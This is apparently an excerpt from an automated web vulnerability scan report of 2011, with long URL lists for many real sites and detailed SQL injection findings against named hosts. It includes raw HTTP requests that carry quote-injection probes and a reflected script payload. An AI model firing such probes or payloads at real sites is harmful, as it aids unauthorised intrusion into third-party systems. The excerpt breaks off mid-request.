12.29. http://www.courtcareers.com/favicon.ico

12.30. http://www.covergirl.com/favicon.ico

12.31. http://www.crosswalk.com/favicon.ico

12.32. http://www.dogpile.com/

12.33. http://www.dogpile.com/dogpile/ws/about/

12.34. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

12.35. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

12.36. http://www.dogpile.com/dogpile/ws/faq/

12.37. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

12.38. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

12.39. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

12.40. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

12.41. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

12.42. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

12.43. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

12.44. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

12.45. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

12.46. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

12.47. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

12.48. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

12.49. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

12.50. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

12.51. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

12.52. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

12.53. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

12.54. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

12.55. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

12.56. http://www.dogpile.com/dogpile_other/ws/index

12.57. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

12.58. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

12.59. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

12.60. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

12.61. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

12.62. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

12.63. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

12.64. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

12.65. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

12.66. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

12.67. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

12.68. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

12.69. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

12.70. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

12.71. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

12.72. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

12.73. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

12.74. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

12.75. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

12.76. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

12.77. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

12.78. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

12.79. http://www.dogpile.com/dogpile_rss/ws/index/

12.80. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

12.81. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

12.82. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

12.83. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11

12.84. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

12.85. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11

12.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

12.87. http://www.hy-vee.com/favicon.ico

12.88. http://www.jillianmichaels.com/favicon.ico

12.89. http://www.mercantila.com/

12.90. http://www.nolo.com/favicon.ico

12.91. http://www.ny1.com/App_Skins/News1/Scripts/functions.js

12.92. http://www.ny1.com/Content/ServeContent.aspx

12.93. http://www.pg.com/favicon.ico

12.94. http://www.phonedog.com/favicon.ico

12.95. http://www.qctimes.com/favicon.ico

12.96. http://www.soccer.com/favicon.ico

12.97. http://www.tonzr.com/favicon.ico

12.98. http://www.wkyt.com/favicon.ico

12.99. http://www.wndu.com/favicon.ico

12.100. http://www.wsaz.com/favicon.ico

13. Email addresses disclosed

13.1. http://investor.infospaceinc.com/phoenix.zhtml

13.2. http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js

13.3. http://www.163.com/favicon.ico

13.4. http://www.amatura.com/favicon.ico

13.5. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

13.6. http://www.atmovs.com/favicon.ico

13.7. http://www.cambridge.org/contacts/

13.8. http://www.cambridge.org/uk/404_error.asp

13.9. http://www.cambridge.org/uk/catalogue/viewBasket.asp

13.10. http://www.cappex.com/favicon.ico

13.11. http://www.car-part.com/favicon.ico

13.12. http://www.colorado.edu/favicon.ico

13.13. http://www.conceptcarz.com/favicon.ico

13.14. http://www.dailydealfetcher.com/Theme/js/jquery.cookie.js

13.15. http://www.dmvnow.com/exec/common/textsizer.js

13.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

13.17. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

13.18. http://www.family-pics.net/favicon.ico

13.19. http://www.fender.com/favicon.ico

13.20. http://www.fueleconomy.gov/favicon.ico

13.21. http://www.imapcast.com/favicon.ico

13.22. http://www.infospaceinc.com/contactus.aspx

13.23. http://www.metapress.com/favicon.ico

13.24. http://www.my-junior-sister.net/favicon.ico

13.25. http://www.mycountdown.org/favicon.ico

13.26. http://www.net-temps.com/favicon.ico

13.27. http://www.noaawatch.gov/favicon.ico

13.28. http://www.outspark.com/favicon.ico

13.29. http://www.overtons.com/favicon.ico

13.30. http://www.palomar.edu/favicon.ico

13.31. http://www.progressiveagent.com/favicon.ico

13.32. http://www.quartalflife.com/favicon.ico

13.33. http://www.quickyellow.com/scripts/v3/js/jquery.colorbox-min.js

13.34. http://www.stvid.com/favicon.ico

13.35. http://www.ucsc.edu/favicon.ico

13.36. http://www.viagra.com/common/js/lib/s_code.js

13.37. http://www.viagra.com/common/swf/js/s_code.js

13.38. http://www.wsaz.com/favicon.ico

14. Private IP addresses disclosed

14.1. http://manhattan.ny1.com/content/top_stories/

14.2. http://static.ak.connect.facebook.com/connect.php/en_US

14.3. http://www.allforgold.com/favicon.ico

14.4. http://www.consolelegends.com/favicon.ico

14.5. http://www.holidayscentral.com/favicon.ico

14.6. http://www.jobtarget.com/favicon.ico

14.7. http://www.jpcycles.com/favicon.ico

14.8. http://www.la-z-boy.com/favicon.ico

14.9. http://www.ny1.com/favicon.ico

14.10. http://www.ny1.com/favicon.ico

14.11. http://www.psasurveys.com/favicon.ico

14.12. http://www.pscufs.com/favicon.ico

14.13. http://www.queerty.com/favicon.ico

14.14. http://www.thoughtprojects.com/favicon.ico

14.15. http://www.tvseriesfinale.com/favicon.ico

15. Credit card numbers disclosed

15.1. http://a.collective-media.net/adj/ns.androidtapp/general

15.2. http://pubads.g.doubleclick.net/gampad/ads

15.3. http://s.aeriagames.com/misc/ads/error_banner_en.html

16. HTML does not specify charset

16.1. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2

16.2. http://ad.doubleclick.net/pfadx/aeriagames_cim/

16.3. http://ds.addthis.com/red/psi/sites/dogpile.com/p.json

16.4. http://ds.addthis.com/red/psi/sites/www.dogpile.com/p.json

16.5. http://fls.doubleclick.net/activityi

16.6. http://uac.advertising.com/wrapper/aceUACping.htm

16.7. http://view.c3metrics.com/c3VTabstrct-6-2.php

16.8. http://view.c3metrics.com/v.js

16.9. http://www.4jobs.com/favicon.ico

16.10. http://www.800adfrenzy.com/favicon.ico

16.11. http://www.accessmycardonline.com/favicon.ico

16.12. http://www.activediner.com/favicon.ico

16.13. http://www.aeriagames.com/favicon.ico

16.14. http://www.affairsclub.com/favicon.ico

16.15. http://www.afterellen.com/favicon.ico

16.16. http://www.allthumbshost.com/favicon.ico

16.17. http://www.amazingfreerewards.com/favicon.ico

16.18. http://www.amazingrewardsonline.com/favicon.ico

16.19. http://www.americajob.com/favicon.ico

16.20. http://www.artsonia.com/favicon.ico

16.21. http://www.asset-cache.net/favicon.ico

16.22. http://www.astrocenter.com/favicon.ico

16.23. http://www.athletic.net/favicon.ico

16.24. http://www.auctionmicro.com/favicon.ico

16.25. http://www.bakati.com/favicon.ico

16.26. http://www.barelist.com/favicon.ico

16.27. http://www.betus.com/favicon.ico

16.28. http://www.biblestudytools.com/favicon.ico

16.29. http://www.big5sportinggoods.com/favicon.ico

16.30. http://www.bittybitznpieces.com/favicon.ico

16.31. http://www.bizbuysell.com/favicon.ico

16.32. http://www.blockbusterexpress.com/favicon.ico

16.33. http://www.bradsdeals.com/favicon.ico

16.34. http://www.bravoatk.com/favicon.ico

16.35. http://www.brownells.com/favicon.ico

16.36. http://www.buildacareer.net/favicon.ico

16.37. http://www.cambridge.org/date/writeYear_js.asp

16.38. http://www.cambridge.org/uk/date/writeYear_js.asp

16.39. http://www.careerplanner.com/favicon.ico

16.40. http://www.caring4cancer.com/favicon.ico

16.41. http://www.carsforsale.com/favicon.ico

16.42. http://www.cdn-businessweek.com/favicon.ico

16.43. http://www.cdn-thestreet.com/favicon.ico

16.44. http://www.centerpointenergy.com/favicon.ico

16.45. http://www.cheaperthandirt.net/favicon.ico

16.46. http://www.cheapostay.com/favicon.ico

16.47. http://www.clipartcastle.com/favicon.ico

16.48. http://www.codeplex.com/favicon.ico

16.49. http://www.covers.com/favicon.ico

16.50. http://www.custom404error.com/favicon.ico

16.51. http://www.dailytech.com/favicon.ico

16.52. http://www.demovirgins.net/favicon.ico

16.53. http://www.diapers.com/favicon.ico

16.54. http://www.dinodirect.com/favicon.ico

16.55. http://www.dltk-holidays.com/favicon.ico

16.56. http://www.ebaycoupon.us/favicon.ico

16.57. http://www.foodnetworkstore.com/favicon.ico

16.58. http://www.freebie-fusion.net/favicon.ico

16.59. http://www.frontdoor.com/favicon.ico

16.60. http://www.funnygranny.com/favicon.ico

16.61. http://www.galsarchive.com/favicon.ico

16.62. http://www.giggidy.com/favicon.ico

16.63. http://www.grammarbook.com/favicon.ico

16.64. http://www.gsnrecipes.com/favicon.ico

16.65. http://www.halloweenexpress.com/favicon.ico

16.66. http://www.hometeamsonline.com/favicon.ico

16.67. http://www.hotfile.com/favicon.ico

16.68. http://www.hqtoplist.com/favicon.ico

16.69. http://www.iforex.com/favicon.ico

16.70. http://www.iframes.us/favicon.ico

16.71. http://www.installiq.com/favicon.ico

16.72. http://www.installiqlearnmore.com/favicon.ico

16.73. http://www.insureme.com/favicon.ico

16.74. http://www.interweave.com/favicon.ico

16.75. http://www.jobappnetwork.com/favicon.ico

16.76. http://www.jobvite.com/favicon.ico

16.77. http://www.justppc.net/favicon.ico

16.78. http://www.k12jobspot.com/favicon.ico

16.79. http://www.kevinsmoneytree.org/favicon.ico

16.80. http://www.latinateens-blog.com/favicon.ico

16.81. http://www.leapfish.com/favicon.ico

16.82. http://www.lilumania.in/favicon.ico

16.83. http://www.mail2web.com/favicon.ico

16.84. http://www.maison-de-la-france.com/favicon.ico

16.85. http://www.maps.com/favicon.ico

16.86. http://www.massagegirls18.net/favicon.ico

16.87. http://www.meaning-of-names.com/favicon.ico

16.88. http://www.melaleuca.com/favicon.ico

16.89. http://www.metapress.com/favicon.ico

16.90. http://www.moneyzue.com/favicon.ico

16.91. http://www.mt.gov/favicon.ico

16.92. http://www.mydigitalpublication.com/favicon.ico

16.93. http://www.myhealthwealthandhappiness.com/favicon.ico

16.94. http://www.myhuckleberry.com/favicon.ico

16.95. http://www.newretirement.com/favicon.ico

16.96. http://www.news-medical.net/favicon.ico

16.97. http://www.newssearchonline.com/favicon.ico

16.98. http://www.nwf.org/favicon.ico

16.99. http://www.optimalfusion.com/favicon.ico

16.100. http://www.oview.com/favicon.ico

16.101. http://www.owners.com/favicon.ico

16.102. http://www.paulsnetwork.com/favicon.ico

16.103. http://www.personalizationmall.com/favicon.ico

16.104. http://www.printfree.com/favicon.ico

16.105. http://www.prize-pending.com/favicon.ico

16.106. http://www.quickyellow.com/favicon.ico

16.107. http://www.quizbar.net/favicon.ico

16.108. http://www.rcuniverse.com/favicon.ico

16.109. http://www.redrobin.com/favicon.ico

16.110. http://www.roirocket.com/favicon.ico

16.111. http://www.rubytuesday.com/favicon.ico

16.112. http://www.sanityswitch.com/favicon.ico

16.113. http://www.santanderconsumerusa.com/favicon.ico

16.114. http://www.scriptpulse.com/favicon.ico

16.115. http://www.searchzue.com/favicon.ico

16.116. http://www.seekysearch.net/favicon.ico

16.117. http://www.smartquote.com/favicon.ico

16.118. http://www.soap.com/favicon.ico

16.119. http://www.southwestvacations.com/favicon.ico

16.120. http://www.starbucksstore.com/favicon.ico

16.121. http://www.sulekha.com/favicon.ico

16.122. http://www.sun.com/favicon.ico

16.123. http://www.super-survey.com/favicon.ico

16.124. http://www.teenchat.com/favicon.ico

16.125. http://www.tennis-warehouse.com/favicon.ico

16.126. http://www.toonier.com/favicon.ico

16.127. http://www.tstickets.com/favicon.ico

16.128. http://www.tubedspots.com/favicon.ico

16.129. http://www.turbolovervidz.com/favicon.ico

16.130. http://www.ultra18.com/favicon.ico

16.131. http://www.usairwaysvacations.com/favicon.ico

16.132. http://www.venus.com/favicon.ico

16.133. http://www.w3i.com/favicon.ico

16.134. http://www.web.com/favicon.ico

16.135. http://www.williamsauction.com/favicon.ico

16.136. http://www.yellowusa.com/favicon.ico

16.137. http://www.youngcourtesans.com/favicon.ico

16.138. http://www.yourdegree.com/favicon.ico

17. HTML uses unrecognised charset

17.1. http://www.163.com/favicon.ico

17.2. http://www.soccer.com/favicon.ico

17.3. http://www.xiongdudu.com/favicon.ico

18. Content type incorrectly stated

18.1. http://ad.doubleclick.net/pfadx/aeriagames_cim/

18.2. http://event.adxpose.com/event.flow

18.3. http://view.c3metrics.com/c3VTabstrct-6-2.php

18.4. http://view.c3metrics.com/v.js

18.5. http://www.1800mobiles.com/favicon.ico

18.6. http://www.4jobs.com/favicon.ico

18.7. http://www.800adfrenzy.com/favicon.ico

18.8. http://www.activediner.com/favicon.ico

18.9. http://www.allheart.com/favicon.ico

18.10. http://www.alloy.com/favicon.ico

18.11. http://www.americajob.com/favicon.ico

18.12. http://www.artsonia.com/favicon.ico

18.13. http://www.astrocenter.com/favicon.ico

18.14. http://www.athletic.net/favicon.ico

18.15. http://www.bakati.com/favicon.ico

18.16. http://www.barelist.com/favicon.ico

18.17. http://www.bebe.com/favicon.ico

18.18. http://www.bellasugar.com/favicon.ico

18.19. http://www.betus.com/favicon.ico

18.20. http://www.biblestudytools.com/favicon.ico

18.21. http://www.biblio.com/favicon.ico

18.22. http://www.big5sportinggoods.com/favicon.ico

18.23. http://www.bizbuysell.com/favicon.ico

18.24. http://www.blockbusterexpress.com/favicon.ico

18.25. http://www.bradsdeals.com/favicon.ico

18.26. http://www.brainpop.com/favicon.ico

18.27. http://www.brownells.com/favicon.ico

18.28. http://www.buildacareer.net/favicon.ico

18.29. http://www.buzzsugar.com/favicon.ico

18.30. http://www.cambridge.org/date/writeYear_js.asp

18.31. http://www.cambridge.org/uk/date/writeYear_js.asp

18.32. http://www.careerplanner.com/favicon.ico

18.33. http://www.caring4cancer.com/favicon.ico

18.34. http://www.carsforsale.com/favicon.ico

18.35. http://www.casasugar.com/favicon.ico

18.36. http://www.cbsatlanta.com/favicon.ico

18.37. http://www.cheaperthandirt.net/favicon.ico

18.38. http://www.cheapostay.com/favicon.ico

18.39. http://www.clipartcastle.com/favicon.ico

18.40. http://www.codeplex.com/favicon.ico

18.41. http://www.covers.com/favicon.ico

18.42. http://www.craigslist.com.au/favicon.ico

18.43. http://www.craigslist.de/favicon.ico

18.44. http://www.custom404error.com/favicon.ico

18.45. http://www.dailystrength.org/favicon.ico

18.46. http://www.dailytech.com/favicon.ico

18.47. http://www.dealio.com/favicon.ico

18.48. http://www.deltadental.com/favicon.ico

18.49. http://www.diapers.com/favicon.ico

18.50. http://www.dinodirect.com/favicon.ico

18.51. http://www.directron.com/favicon.ico

18.52. http://www.dltk-holidays.com/favicon.ico

18.53. http://www.fabsugar.com/favicon.ico

18.54. http://www.findstuff.com/favicon.ico

18.55. http://www.foodnetworkstore.com/favicon.ico

18.56. http://www.frontdoor.com/favicon.ico

18.57. http://www.genealogybank.com/favicon.ico

18.58. http://www.greatdreams.com/favicon.ico

18.59. http://www.gsnrecipes.com/favicon.ico

18.60. http://www.hometeamsonline.com/favicon.ico

18.61. http://www.iforex.com/favicon.ico

18.62. http://www.inforum.com/favicon.ico

18.63. http://www.installiq.com/favicon.ico

18.64. http://www.installiqlearnmore.com/favicon.ico

18.65. http://www.insureme.com/favicon.ico

18.66. http://www.interweave.com/favicon.ico

18.67. http://www.jobappnetwork.com/favicon.ico

18.68. http://www.jobvite.com/favicon.ico

18.69. http://www.k12jobspot.com/favicon.ico

18.70. http://www.kitv.com/favicon.ico

18.71. http://www.klm.com/favicon.ico

18.72. http://www.ksat.com/favicon.ico

18.73. http://www.leapfish.com/favicon.ico

18.74. http://www.mail2web.com/favicon.ico

18.75. http://www.maps.com/favicon.ico

18.76. http://www.mattel.com/favicon.ico

18.77. http://www.meaning-of-names.com/favicon.ico

18.78. http://www.melaleuca.com/favicon.ico

18.79. http://www.mercantila-checkout.com/setcookie.js

18.80. http://www.mercantila.com/website/common/commonbroker.php

18.81. http://www.mercantila.com/website/shoppingcart/cartbroker.php

18.82. http://www.mirror.co.uk/favicon.ico

18.83. http://www.ms.gov/favicon.ico

18.84. http://www.mt.gov/favicon.ico

18.85. http://www.myhuckleberry.com/favicon.ico

18.86. http://www.mysun.co.uk/favicon.ico

18.87. http://www.nairaland.com/favicon.ico

18.88. http://www.naturallycurly.com/favicon.ico

18.89. http://www.newretirement.com/favicon.ico

18.90. http://www.news-medical.net/favicon.ico

18.91. http://www.nwf.org/favicon.ico

18.92. http://www.owners.com/favicon.ico

18.93. http://www.pennystockalley.com/favicon.ico

18.94. http://www.personalizationmall.com/favicon.ico

18.95. http://www.printfree.com/favicon.ico

18.96. http://www.puma.com/favicon.ico

18.97. http://www.rcuniverse.com/favicon.ico

18.98. http://www.redrobin.com/favicon.ico

18.99. http://www.rk.com/favicon.ico

18.100. http://www.roirocket.com/favicon.ico

18.101. http://www.rubytuesday.com/favicon.ico

18.102. http://www.sanityswitch.com/favicon.ico

18.103. http://www.shaadi.com/favicon.ico

18.104. http://www.soap.com/favicon.ico

18.105. http://www.southwestvacations.com/favicon.ico

18.106. http://www.starbucksstore.com/favicon.ico

18.107. http://www.strefa.pl/favicon.ico

18.108. http://www.sulekha.com/favicon.ico

18.109. http://www.syracuse.com/favicon.ico

18.110. http://www.tennis-warehouse.com/favicon.ico

18.111. http://www.theage.com.au/favicon.ico

18.112. http://www.tressugar.com/favicon.ico

18.113. http://www.tstickets.com/favicon.ico

18.114. http://www.venus.com/favicon.ico

18.115. http://www.w3i.com/favicon.ico

18.116. http://www.web.com/favicon.ico

18.117. http://www.williamsauction.com/favicon.ico

18.118. http://www.wlky.com/favicon.ico

18.119. http://www.worldwidelearn.com/favicon.ico

18.120. http://www.yellowusa.com/favicon.ico

18.121. http://www.yourdegree.com/favicon.ico

19. Content type is not specified

19.1. http://82.cim.meebo.com/cmd/tc

19.2. http://suggest.infospace.com/QuerySuggest/SuggestServlet

19.3. http://suggest.infospace.com/favicon.ico

19.4. http://webiq005.webiqonline.com/WebIQ/DataServer/HandlePageTag.srf

19.5. http://www.adleaf.com/favicon.ico

19.6. http://www.billoreilly.com/favicon.ico

19.7. http://www.cableone.net/favicon.ico

19.8. http://www.fender.com/favicon.ico

19.9. http://www.freelocaljob.com/favicon.ico

19.10. http://www.kraftbrands.com/favicon.ico

19.11. http://www.liasophia.com/favicon.ico

19.12. http://www.nicusa.com/favicon.ico

19.13. http://www.peopletopeople.com/favicon.ico

19.14. http://www.shtyle.fm/favicon.ico

19.15. http://www.smartauction.biz/favicon.ico

19.16. http://www.solow.com/favicon.ico

19.17. http://www.tangowire.com/favicon.ico

19.18. http://www.theupperfloor.com/favicon.ico



1. SQL injection  next
There are 4 instances of this issue:


1.1. http://politicalwire.com/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://politicalwire.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico' HTTP/1.1
Host: politicalwire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 15:46:04 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2389
Content-Type: text/html

<b>Error:</b> pdo error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/favicon.ico'/index%'))
and te' at line 2] in EXECUT
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
Host: politicalwire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not found
Date: Fri, 01 Apr 2011 15:46:06 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 22567
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.2. http://www.cambridge.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cambridge.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cambridge.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 283
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 16:20:01 GMT
Connection: close
Set-Cookie: ASPSESSIONIDAABDSSSR=KCLAEEPCNJAMKMPJHPPHKMKP; path=/
Set-Cookie: X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; path=/

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for Oracle</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>ORA-00911: invalid character
</font>
<p>
<fon
...[SNIP]...

1.3. http://www.dogpile.com/dogpile_other/ws/index [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ebd2addac4004eada5cac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:35 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:34 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
=true"); }
.addSearchProvider { background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_cloud.gif/_iceUrlFlag=15?_IceUrl=true"); }
.tellFriendError{background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/error_icn.gif/_iceUrlFlag=15?_IceUrl=true");}
.tellFriendSuccess{background-image:url("http://ttl60m.dp
...[SNIP]...

Request 2

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
